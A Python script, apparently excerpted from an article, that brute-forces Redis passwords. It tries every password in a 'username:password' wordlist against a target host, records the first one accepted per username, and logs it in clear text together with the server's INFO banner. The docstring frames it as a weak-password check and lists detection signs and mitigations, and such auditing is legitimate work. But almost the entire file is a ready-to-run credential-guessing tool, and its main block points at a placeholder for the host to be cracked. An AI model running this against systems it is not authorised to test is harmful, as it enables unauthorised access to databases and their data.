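# -*- coding: utf-8 -*-
# Excerpted from another article (the page does not name the source).
"""Redis weak-password check driven by a "username:password" word list.

For every candidate password the script builds a new client for one
host/port, sends INFO, and records the first password per username for
which the server answers.  The username is never sent to the server; it
is only a label carried into the result row and the log line.

What this looks like from the server side: a series of short-lived
connections from one source address, each ending in a rejected
authentication.  Redis 6 and later keep rejected AUTH attempts in
``ACL LOG``.  The usual mitigations are to keep the port off untrusted
networks (``bind``, ``protected-mode``) and to use a long random
``requirepass`` / ACL password, because Redis itself does not slow down
repeated guesses.
"""
import logging

import redis

# Seconds. Used for the TCP connect and for waiting on each reply.
LOGIN_TIMEOUT = 12

_log = logging.getLogger()


class RedisAuth:
    """Try a single password against one Redis endpoint."""

    def __init__(self, addr):
        """Remember the target.

        Args:
            addr: ``(host, port)`` tuple, passed as one positional argument.
        """
        host, port = addr
        self.addr = (host, port)
        _log.debug('target %s:%s', host, port)

    def login(self, username='', password=''):
        """Send INFO with ``password`` and report how the server reacted.

        Args:
            username: label only; it is not used for authentication.
            password: password handed to the Redis client.

        Returns:
            ``(conn_ok, auth_ok, banner)``.  ``auth_ok`` is True only when
            INFO returned; ``banner`` is then ``str()`` of the INFO reply.
            ``conn_ok`` is True on success, or when the error text contains
            ``'Password'``.
        """
        conn_ok, auth_ok, banner = False, False, ''
        host, port = self.addr
        try:
            # Constructing the client does not talk to the server; the first
            # command does.  The status flags are therefore set only after
            # INFO has returned, so a rejected password can no longer be
            # reported as (True, True, '').
            client = redis.StrictRedis(
                host=host,
                port=port,
                password=password,
                db=0,
                socket_connect_timeout=LOGIN_TIMEOUT,
                # Without a read timeout a peer that accepts the connection
                # but never replies would block the run indefinitely.
                socket_timeout=LOGIN_TIMEOUT,
            )
            info = client.info()
        except Exception as e:
            es = str(e)
            # Case-sensitive match on the client library's error text; any
            # other wording is classified as a connection failure.
            # NOTE(review): the wording differs between library/server
            # versions - confirm against the versions in use.
            conn_ok = es.find('Password') >= 0
            _log.info('ERR:1 %s:%d %s', host, port, es)
        else:
            conn_ok = auth_ok = True
            banner = str(info)
            # The accepted password is written to the log in clear text;
            # treat the log destination as sensitive.
            _log.warning('FOUND %s:%s@%s:%d', username, password, host, port)
        return conn_ok, auth_ok, banner


class RedisBruteTester:
    """Run a username -> passwords dictionary against one endpoint."""

    def __init__(self, userdict, passwords=None):
        """Store the dictionary.

        Args:
            userdict: mapping of username to an iterable of passwords.
            passwords: accepted for compatibility; not used.
        """
        self.userdict = userdict

    def test(self, task):
        """Try every password of every username against ``task``.

        Args:
            task: sequence whose first two items are host and port.

        Returns:
            List of ``[host, port, 'REDIS', username, password, banner]``
            rows, at most one per username (the inner loop stops at the
            first accepted password).  Empty when nothing was accepted.
        """
        host, port = task[0], task[1]
        rs = []
        auth = RedisAuth((host, port))
        for username in self.userdict:
            for password in self.userdict[username]:
                conn_ok, auth_ok, banner = auth.login(username, password)
                # Candidate passwords and the INFO reply are kept out of
                # the debug output on purpose.
                _log.debug('conn_ok=%s auth_ok=%s', conn_ok, auth_ok)
                if not (conn_ok and auth_ok):
                    # An unreachable host is not treated as fatal; the
                    # remaining candidates are still tried.
                    continue
                rs.append([host, port, 'REDIS', username, password, banner])
                break
        if not rs:
            # 'SAFE' only means that no listed password was accepted; it is
            # also logged when the host could not be reached at all.
            _log.info('SAFE %s:%d', host, port)
        return rs


if __name__ == '__main__':
    host, port = "需要暴力破解的host", 6379
    userdict = dict()
    # One "username:password" pair per line; lines without ':' are skipped.
    # The context manager closes the file even if parsing raises.
    with open('c:\\redis_userpasswd.txt') as fh:
        for ln in fh:
            fs = ln.strip().split(':', 1)
            if len(fs) != 2:
                continue
            username, password = fs
            userdict.setdefault(username, set()).add(password)
    # Logging is not configured here (the original xutils.initLogger call
    # was commented out), so by default only the FOUND warning is emitted.
    tester = RedisBruteTester(userdict)
    rs = tester.test((host, port))
    if not rs:
        print('Faild')
    else:
        print(rs)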